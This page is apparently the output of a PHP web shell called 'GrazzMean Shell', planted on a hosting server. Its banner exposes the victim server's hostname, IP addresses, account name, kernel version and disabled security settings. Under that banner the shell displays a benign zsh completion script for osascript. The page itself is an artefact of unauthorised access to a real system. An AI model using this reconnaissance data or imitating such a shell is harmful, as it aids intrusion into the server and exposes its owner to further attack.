shell bypass 403

GrazzMean Shell

: /usr/share/zsh/5.5.1/functions/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 3.144.26.47
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : _osascript
#compdef osascript

local ret=1
local -a context line state state_descr tmp
local -A opt_args val_args

_arguments -s -S : \
  '-l+[specify script language]: :->languages' \
  '(:)*-e+[execute specified line of script]:script' \
  '-i[run interactively]' \
  '*-s+[specify output style]: :->modifiers' \
  '(-e)1:script file:_files' \
&& ret=0

case $state in
  languages)
    # So far, the three languages specified here are the only ones supported,
    # but adding the output of osalang makes this future-proof
    _values 'script language' \
      AppleScript JavaScript 'Generic Scripting System' \
      ${(f)"$( command osalang 2> /dev/null )"} \
    && ret=0
    ;;
  modifiers)
    _values -S '' 'output modifier flag' \
      'h[print values in human-readable form]' \
      's[print values in recompilable source form]' \
      'e[print script errors to stderr]' \
      'o[print script errors to stdout]' \
    && ret=0
    ;;
esac

return ret
© 2025 GrazzMean